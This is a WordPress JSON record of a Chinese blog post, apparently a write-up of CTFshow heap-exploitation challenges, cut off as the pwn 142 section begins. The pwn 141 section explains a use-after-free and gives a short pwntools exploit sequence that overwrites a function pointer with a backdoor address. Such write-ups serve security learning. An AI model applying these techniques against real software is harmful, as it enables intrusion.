{"id":211,"date":"2024-12-11T23:58:32","date_gmt":"2024-12-11T15:58:32","guid":{"rendered":"http:\/\/8.141.27.105\/?p=211"},"modified":"2024-12-23T17:11:59","modified_gmt":"2024-12-23T09:11:59","slug":"ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/","title":{"rendered":"CTFSHOW|PWN\u5165\u95e8|\u5806\u5229\u7528\u90e8\u5206WP"},"content":{"rendered":"\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' 
><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_141%EF%BC%88%E7%AE%80%E5%8D%95UAF%EF%BC%89\" title=\"pwn 141\uff08\u7b80\u5355UAF\uff09\">pwn 141\uff08\u7b80\u5355UAF\uff09<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_142heap_extendlibc\" title=\"pwn 142(heap extend+libc)\">pwn 142(heap extend+libc)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_143_house_of_force\" title=\"pwn 143 (house of force)\">pwn 143 (house of force)<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_143%E5%8F%A6%E4%B8%80%E7%A7%8D%E8%A7%A3%E6%B3%95%E9%87%8D%E8%A6%81unlink\" title=\"pwn 143\u53e6\u4e00\u79cd\u89e3\u6cd5|\u91cd\u8981|unlink\">pwn 143\u53e6\u4e00\u79cd\u89e3\u6cd5|\u91cd\u8981|unlink<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_144\" title=\"pwn 144\">pwn 144<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/n0ps1ed.top\/index.php\/2024\/12\/11\/ctfshow-pwn%e5%85%a5%e9%97%a8-%e5%a0%86%e5%88%a9%e7%94%a8%e9%83%a8%e5%88%86wp\/#pwn_160%EF%BC%88%E5%A0%86%E9%A3%8E%E6%B0%B4%EF%BC%89\" 
title=\"pwn 160\uff08\u5806\u98ce\u6c34\uff09\">pwn 160\uff08\u5806\u98ce\u6c34\uff09<\/a><\/li><\/ul><\/nav><\/div>\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_141%EF%BC%88%E7%AE%80%E5%8D%95UAF%EF%BC%89\"><\/span>pwn 141\uff08\u7b80\u5355UAF\uff09<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p id=\"u7efff913\">\u7ecf\u5178\u83dc\u5355:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/GNY_M3@FJ2W@561S1.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"476\" height=\"698\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/GNY_M3@FJ2W@561S1.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-212\"  sizes=\"auto, (max-width: 476px) 100vw, 476px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uc5d88aad\">add_note\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/J_O1M4ZP46634TDEYW.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"858\" height=\"732\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/J_O1M4ZP46634TDEYW.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-214\"  sizes=\"auto, (max-width: 858px) 100vw, 858px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"u8d3d80dc\">del note\uff1afree\u5b8c\u4e0d\u60ac\u7a7a\uff0c\u6709UAF<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/S0ZK@K3MYIVIUMO90.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"737\" height=\"584\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/S0ZK@K3MYIVIUMO90.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-216\"  sizes=\"auto, (max-width: 737px) 100vw, 737px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ua4c188a9\">print_note:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/0@F5O981NSNQTAGSOC6-1024x499.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"499\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/0@F5O981NSNQTAGSOC6-1024x499.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-217\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1a8e0a0b\">\u8fd9\u91cc\u6211\u770b\u53cd\u6c47\u7f16\u4ee3\u7801\u770b\u4e86\u597d\u4e45\u4e5f\u6ca1\u6709\u5f7b\u5e95\u641e\u61c2\uff0c\u4ece\u7f51\u4e0a\u627e\u5230\u6e90\u7801\u624d\u5f7b\u5e95\u641e\u61c2\uff1a<\/p>\n\n\n\n<p id=\"uce801f4f\"><a href=\"https:\/\/www.freebuf.com\/articles\/system\/289270.html\" target=\"_blank\" rel=\"noreferrer noopener\">Use After Free\u6f0f\u6d1e\u53ca\u5176\u5229\u7528 &#8211; FreeBuf\u7f51\u7edc\u5b89\u5168\u884c\u4e1a\u95e8\u6237<\/a><\/p>\n\n\n\n<p id=\"uf0e69fa3\">\u5148\u770baddnote<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/S33Q0C4P8MJB@7W6U0AM.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"858\" height=\"732\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/S33Q0C4P8MJB@7W6U0AM.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-218\"  sizes=\"auto, (max-width: 858px) 100vw, 858px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u3614c2c6\">\u5bf9\u6bd4\u6e90\u7801\uff0c\u989c\u8272\u76f8\u540c\u7684\u5c31\u662f\u540c\u4e00\u4ee3\u7801<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' 
data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/Z3CKM0IK3ZU0BG6BRKHY.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"888\" height=\"944\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/Z3CKM0IK3ZU0BG6BRKHY.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-219\"  sizes=\"auto, (max-width: 888px) 100vw, 888px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u6c360223\">&amp;notelist+i\u5c31\u76f8\u5f53\u4e8enotelist[i],\u800c*(&amp;notelist+i)\u53ef\u4ee5\u8fd9\u4e48\u7406\u89e3:(&amp;notelist+i)\u662f\u4e00\u4e2a\u5730\u5740\uff0c*(&amp;notelist+i)=malloc(n)\uff0c*\u662f\u53d6\u8fd9\u4e2a\u5730\u5740\u5b58\u7684\u503c\uff0c\u7531\u4e8emalloc\u8fd4\u56de\u7684\u662f\u5206\u914d\u5185\u5b58\u7684\u9996\u5730\u5740\uff0c\u4e5f\u5c31\u662f(&amp;notelist+i)\u7684\u503c\u5b58\u7684\u5c31\u662f\u5206\u914d\u5185\u5b58\u7684\u9996\u5730\u5740\uff0c\u5982\u679c\u6ca1\u6709*\u53f7\uff0c\u5c31\u4f1a\u5bfc\u81f4(&amp;notelist+i)\u8fd9\u4e2a\u5730\u5740\u53d8\u6210\u4e86malloc\u5206\u914d\u7684chunk\u7684\u9996\u5730\u5740\u3002\u6bd4\u5982(&amp;notelist+i)\u662f0x8000,\u4e00\u5f00\u59cb\u5b58\u7684\u662f1\uff0c*(&amp;notelist+i)=3,\u5c31\u4f1a\u5bfc\u81f4\u5b58\u76841\u53d8\u62103\uff0c\u800c(&amp;notelist+i)=3\u5219\u662f(&amp;notelist+i)\u672c\u8eab\u53d8\u6210\u4e860x3\u3002\u53ef\u4ee5\u628a(&amp;notelist+i)\u5f53\u6210\u4e00\u4e2a\u6307\u9488p\u6765\u7406\u89e3<\/p>\n\n\n\n<p 
id=\"u557b456b\">notelist[i]\u662f\u4e2a\u6307\u9488\uff08\u5730\u5740\uff09\uff0c\u6307\u5411\u4e00\u4e2anote\u7ed3\u6784\u4f53\uff0c\u4e00\u4e2anote\u7ed3\u6784\u4f53\u53c8\u6709\u4e24\u4e2a\u6307\u9488\u6210\u5458\uff0c\u6307\u9488\u4e00\u6307\u5411\u4e86\u4e00\u4e2aprint_note\u51fd\u6570,\u6307\u9488\u4e8c\u6307\u5411\u7684\u5730\u5740\u5219\u5f00\u8f9f\u4e3a\u5b57\u7b26\u4e32\u3002<\/p>\n\n\n\n<p id=\"u7bd4f5f5\">\u800c\u9ec4\u8272\u6846\u6846\u7684\u4e24\u4e2a*\u53f7\uff0c\u4e5f\u7528\u540c\u6837\u65b9\u6cd5\u7406\u89e3\u3002\u628a\u4e00\u4e2a\u5730\u5740\u5f53\u6210chunk\u7684\u4e00\u4e2a\u6210\u5458\u3002\u84dd\u8272\u6846\u4e5f\u662f\u4e00\u6837\u9053\u7406\u3002<\/p>\n\n\n\n<p id=\"u83bef906\">\u6240\u4ee5\u793a\u610f\u56fe\u5982\u4e0b\uff0c\u5f53\u5728\u8fdb\u884cadd_note\u64cd\u4f5c\u65f6\uff0c\u5b9e\u9645\u4e0a\u7533\u8bf7\u4e86\u4e24\u6b21malloc:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/V3O9MO6N99XLNTJ7ZU9GQG-1024x430.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"430\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/V3O9MO6N99XLNTJ7ZU9GQG-1024x430.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-220\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ub2a793ff\">\u540c\u65f6\uff0c\u53d1\u73b0\u9898\u76ee\u6709\u540e\u95e8\u51fd\u6570\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/RMI1TRHWOCOROG6_SNS.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"503\" height=\"215\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/RMI1TRHWOCOROG6_SNS.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-221\"  sizes=\"auto, (max-width: 503px) 100vw, 503px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u75f17f91\">\u5f53\u6211\u4eec\u7533\u8bf7\u4e00\u4e2achunk\u65f6\uff0c\u80fd\u591f\u6539\u5199\u7684\u53ea\u6709\u6307\u9488p2\u4e5f\u5c31\u662fcontent\u6210\u5458\uff0c\u90a3\u5982\u4f55\u7528UAF\u505a\u5230\u80fd\u4fee\u6539\u6307\u9488p1\u5462\uff1f<\/p>\n\n\n\n<p id=\"u48a3ad7a\">\u5982\u679c\u5148\u7533\u8bf7\u4e00\u4e2achunk1\u7136\u540efree\u6389\uff0c\u518d\u7533\u8bf7\u4e00\u4e2achunk2\uff0c\u628acontent\u7533\u8bf7\u7684\u5927\u5c0f\u6539\u6210chunk1\u5927\u5c0f\uff0c\u80fd\u4e0d\u80fd\u7533\u8bf7\u5230chunk1\u7684\u5730\u5740\u5462\uff1f\u7b54\u6848\u662f\u4e0d\u884c\uff0c\u56e0\u4e3a\u7533\u8bf7chunk2\u672c\u4f53\u65f6\u5019\u5c31\u4f1a\u628achunk1\u7ed9\u5b83\uff0c\u518d\u7533\u8bf7chunk2\u7684content\u5b57\u6bb5\u65f6\u5019\u5c31\u4f1a\u53e6\u7ed9\u4e86<\/p>\n\n\n\n<p id=\"uc4d0a7be\">\u90a3\u5c31\u5f88\u5bb9\u6613\u60f3\u5230\uff0c\u6211\u7533\u8bf7\u4e24\u4e2a\u5462\uff1f<\/p>\n\n\n\n<p 
id=\"ue5c8d4b3\">\u5148\u7533\u8bf7chunk1\uff0c\u518d\u7533\u8bf7chunk2\uff0c\u4f9d\u6b21free\u6389\uff0c\u6b64\u65f6fastbin\u91cc\u9762\u5c31\u6709chunk1\u548cchunk2\uff0c\u7136\u540e\u6211\u518d\u7533\u8bf7chunk3,\uff08\u7531\u4e8efastbin\u5148\u8fdb\u540e\u51fa\uff09\uff0cchunk3\u7684\u672c\u4f53\u5c31\u4f1a\u62ff\u5230chunk2\u7684\u5185\u5b58\uff0c\u7136\u540e\u7533\u8bf7chunk3\u7684content\u5b57\u6bb5\u8ddfchunk\u7ed3\u6784\u4f53\u5927\u5c0f\u4e00\u6837\uff088bytes\uff09\u7684\u8bdd\uff0c\u5c31\u4f1a\u628achunk1\u7684\u5185\u5b58\u5206\u914d\u7ed9\u5b83\uff01<\/p>\n\n\n\n<p id=\"u2c95b504\">\u6240\u4ee5\u6b64\u65f6\u4fee\u6539chunk3\u7684content\u5c31\u662f\u4fee\u6539chunk1\uff0c\u6539\u524d\u56db\u5b57\u8282\u4e3a\u540e\u95e8\u51fd\u6570\u7684\u5730\u5740\uff0c\u8c03\u7528print_note\uff0c\u5c31\u4f1a\u8c03\u7528\u540e\u95e8\u51fd\u6570\uff0c\u6210\u529f\u62ff\u5230flag<\/p>\n\n\n\n<p id=\"u8cb085ca\">exp\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/86S1HYQ9UABGS8GKV.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"735\" height=\"690\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/86S1HYQ9UABGS8GKV.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-222\"  sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u2cb7352a\">add(16, &#8220;aaaa&#8221;)<\/p>\n\n\n\n<p id=\"u159853bf\">add(16, &#8220;aaaa&#8221;)<\/p>\n\n\n\n<p 
id=\"ubdd3ccd8\">delete(0)<\/p>\n\n\n\n<p id=\"u7ff07a42\">delete(1)<\/p>\n\n\n\n<p id=\"u675e075e\">add(8, p32(use))<\/p>\n\n\n\n<p id=\"u69633e49\">show(0)<\/p>\n\n\n\n<p id=\"u1f9dbe6a\">io.interactive()<\/p>\n\n\n\n<p id=\"u7ca03a1b\">\u6ce8\u610f\uff0cchunk1\u548cchunk2\u7684content\u5927\u5c0f\u6309\u7406\u6765\u8bf4\u662f\u53ef\u4ee5\u968f\u4fbf\u586b\u7684\uff0c\u53ea\u8981\u4e0d\u662fchunk\u672c\u8eab\u5927\u5c0f\u5c31\u884c\u4e86\uff0c\u4f46\u662f\u5b9e\u9645\u4e0a\u4e5f\u4f1a\u6709\u4e00\u5b9a\u8303\u56f4\u9650\u5236\uff08&gt;12\uff09,\u800c\u4e14chunk3\u7684content\u4e5f\u4e0d\u4e00\u5b9a\u5fc5\u987b\u7b49\u4e8e8\uff0c&gt;=4\u90fd\u53ef\u4ee5\uff0c\u5177\u4f53\u539f\u56e0\u672a\u77e5\uff08\u63a8\u6d4b\u662fmalloc\u5bf9\u9f50\u9020\u6210\u7684\uff1a32\u4f4d\u4e0b\u7533\u8bf7\u4e0d\u8d85\u8fc712\u5b57\u8282\u90fd\u4f1a\u5f97\u52300x10\u5927\u5c0f\u7684chunk\uff0c\u548c8\u5b57\u8282\u7684\u7ed3\u6784\u4f53\u5728\u540c\u4e00\u4e2afastbin\u91cc\uff0c\u6240\u4ee5chunk3\u7684content\u57284\u523012\u4e4b\u95f4\u90fd\u80fd\u62ff\u5230\u7ed3\u6784\u4f53\uff0c\u800cchunk1\u548cchunk2\u7684content\u5927\u4e8e12\u624d\u4e0d\u4f1a\u5360\u7528\u8fd9\u4e2abin\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/MXP8DZ3U5X43ODUD.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"693\" height=\"455\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/MXP8DZ3U5X43ODUD.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-224\"  sizes=\"auto, (max-width: 693px) 100vw, 693px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"pwn_142heap_extendlibc\"><\/span>pwn 142(heap extend+libc)<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SILO80TK@N5X8@J9.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"969\" height=\"852\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SILO80TK@N5X8@J9.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-227\"  sizes=\"auto, (max-width: 969px) 100vw, 969px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ua2530c7a\">1\u662f\u521b\u5efa\u5806<\/p>\n\n\n\n<p id=\"u5b6e375a\">2\u662f\u7f16\u8f91\u5806<\/p>\n\n\n\n<p id=\"u9debf8dd\">3\u662f\u6253\u5370\u5806<\/p>\n\n\n\n<p id=\"u23654a70\">4\u662f\u5220\u9664\u5806<\/p>\n\n\n\n<p 